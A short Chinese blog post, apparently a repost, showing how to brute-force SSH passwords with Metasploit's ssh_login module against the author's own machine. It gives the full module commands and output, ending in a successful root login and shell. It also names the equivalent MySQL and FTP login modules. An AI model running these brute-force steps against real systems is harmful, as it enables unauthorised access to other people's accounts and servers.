昔日

ssh密码破解

Rule:

SSH登陆密码的破解:





search ssh_login







msf > use auxiliary/scanner/ssh/ssh_login


msf auxiliary(ssh_login) > show options




本机测试:设置目标IP,线程,密码字典文件:



msf auxiliary(ssh_login) > set RHOSTS 127.0.0.1


RHOSTS => 127.0.0.1


msf auxiliary(ssh_login) > set THREADS 50


THREADS => 50


msf auxiliary(ssh_login) > set PASS_FILE /root/Desktop/01.txt


PASS_FILE => /root/Desktop/01.txt


msf auxiliary(ssh_login) > exploit



运行结果,根据字典文件暴力破解:



[*] 127.0.0.1:22 SSH - Starting bruteforce


[-] 127.0.0.1:22 SSH - Failed: 'root:0000'


[-] 127.0.0.1:22 SSH - Failed: 'root:1111'


[-] 127.0.0.1:22 SSH - Failed: 'root:aaaa'


[-] 127.0.0.1:22 SSH - Failed: 'root:bbbb'


[-] 127.0.0.1:22 SSH - Failed: 'root:cccc'


[-] 127.0.0.1:22 SSH - Failed: 'root:xxxx'


[-] 127.0.0.1:22 SSH - Failed: 'root:root'


[+] 127.0.0.1:22 SSH - Success: 'root:toor' 'uid=0(root) gid=0(root) 组=0(root) Linux kali 4.4.0-kali1-amd64 #1 SMP Debian 4.4.6-1kali1 (2016-03-18) x86_64 GNU/Linux '


[*] Command shell session 4 opened (127.0.0.1:43615 -> 127.0.0.1:22) at 2016-04-05 01:38:06 +0800


[*] Scanned 1 of 1 hosts (100% complete)


[*] Auxiliary module execution completed





同上,扫描MYSQL则使用的模块为auxiliary/scanner/mysql/mysql_login


扫描FTP使用auxiliary/scanner/ftp/ftp_login


而能否破解,则完全取决于字典



评论

热度(1)

  1. 昔日Rule 转载了此文字